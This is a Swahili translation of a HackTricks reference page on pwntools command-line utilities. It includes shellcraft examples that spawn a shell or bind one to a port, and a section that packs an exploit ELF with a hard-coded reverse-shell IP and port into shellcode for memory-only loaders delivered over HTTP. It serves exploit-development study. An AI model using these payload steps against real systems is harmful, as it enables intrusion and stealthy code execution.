PwnTools

Reading time: 4 minutes

tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks 
pip3 install pwntools

Pwn asm

Pata opcodes kutoka kwa mstari au faili.

pwn asm "jmp esp"
pwn asm -i <filepath>

Unaweza kuchagua:

  • aina ya output (raw,hex,string,elf)
  • muktadha wa faili za output (16,32,64,linux,windows...)
  • epuka bytes (new lines, null, a list)
  • chagua encoder, debug shellcode kwa kutumia gdb na endesha output

Pwn checksec

Skripti ya Checksec

pwn checksec <executable>

Pwn constgrep

Pwn cyclic

Pata muundo

pwn cyclic 3000
pwn cyclic -l faad

Inaweza kuchagua:

  • Alfabeta inayotumika (herufi ndogo kwa chaguo-msingi)
  • Urefu wa uniq pattern (chaguo-msingi 4)
  • context (16,32,64,linux,windows...)
  • Chukua offset (-l)

Pwn debug

Unganisha GDB kwenye mchakato

pwn debug --exec /bin/bash
pwn debug --pid 1234
pwn debug --process bash

Inaweza kuchagua:

  • Kwa executable, kwa jina au kwa muktadha wa pid (16,32,64,linux,windows...)
  • gdbscript ya kutekeleza
  • sysrootpath

Pwn disablenx

Zima nx ya binary

pwn disablenx <filepath>

Pwn disasm

Changanua opcodes za hex

pwn disasm ffe4

Unaweza kuchagua:

  • context (16,32,64,linux,windows...)
  • base addres
  • color(default)/no color

Pwn elfdiff

Onyesha tofauti kati ya faili 2

pwn elfdiff <file1> <file2>

Pwn hex

Pata uwakilishi wa heksadesimali

bash
pwn hex hola #Get hex of "hola" ascii

Pwn phd

Pata hexdump

pwn phd <file>

Inaweza kuchagua:

  • Idadi ya bytes za kuonyesha
  • Idadi ya bytes kwa kila mstari (byte ya kuangazia)
  • Ruka bytes mwanzoni

Pwn pwnstrip

Pwn scrable

Pwn shellcraft

Pata shellcodes

pwn shellcraft -l #List shellcodes
pwn shellcraft -l amd #Shellcode with amd in the name
pwn shellcraft -f hex amd64.linux.sh #Create in C and run
pwn shellcraft -r amd64.linux.sh #Run to test. Get shell
pwn shellcraft .r amd64.linux.bindsh 9095 #Bind SH to port

Inaweza kuchaguliwa:

  • shellcode na vigezo kwa ajili ya shellcode
  • Faili ya pato
  • Umbizo la pato
  • debug (ambatisha dbg kwa shellcode)
  • kabla (debug trap kabla ya code)
  • baada
  • epuka kutumia opcodes (chaguo-msingi: not null and new line)
  • Endesha shellcode
  • Rangi/hauna rangi
  • orodhesha syscalls
  • orodhesha shellcodes zinazowezekana
  • Tengeneza ELF kama shared library

Pwn template

Pata template ya python

pwn template

Inaweza kuchagua: host, port, user, pass, path and quiet

Pwn unhex

Kutoka hex hadi string

pwn unhex 686f6c61

Sasisho la Pwn

Ili kusasisha pwntools

pwn update

ELF → raw shellcode ufungashaji (loader_append)

Pwntools inaweza kubadilisha ELF huru kuwa blob moja la raw shellcode linalopanga mwenyewe sekimenti zake na kuhamisha execution kwa original entrypoint. Hii ni bora kwa memory-only loaders (mfano, Android apps zinazoita JNI kutekeleza downloaded bytes).

Mchakato wa kawaida (mfano amd64)

  1. Jenga payload ELF imara, position‑independent (musl inashauriwa kwa uhamaji):
bash
musl-gcc -O3 -s -static -o exploit exploit.c \
-DREV_SHELL_IP="\"10.10.14.2\"" -DREV_SHELL_PORT="\"4444\""
  1. Geuza ELF → shellcode kwa pwntools:
python
# exp2sc.py
from pwn import *
context.clear(arch='amd64')
elf = ELF('./exploit')
sc = asm(shellcraft.loader_append(elf.data, arch='amd64'))
open('sc','wb').write(sc)
print(f"ELF size={len(elf.data)} bytes, shellcode size={len(sc)} bytes")
  1. Wasilisha sc kwa memory loader (mfano, via HTTP[S]) na uitekeleze ndani ya mchakato.

Vidokezo

  • loader_append inaingiza programu asili ya ELF ndani ya shellcode na hutoa loader ndogo inayofanya mmaps kwa segments na kuruka kwenye entry.
  • Kuwa wazi kuhusu usanifu kwa kutumia context.clear(arch=...). arm64 ni ya kawaida kwenye Android.
  • Hakikisha code ya payload yako haitegemei nafasi (position‑independent) na usitegemeee dhana za ASLR/NX za mchakato.

Marejeo

tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks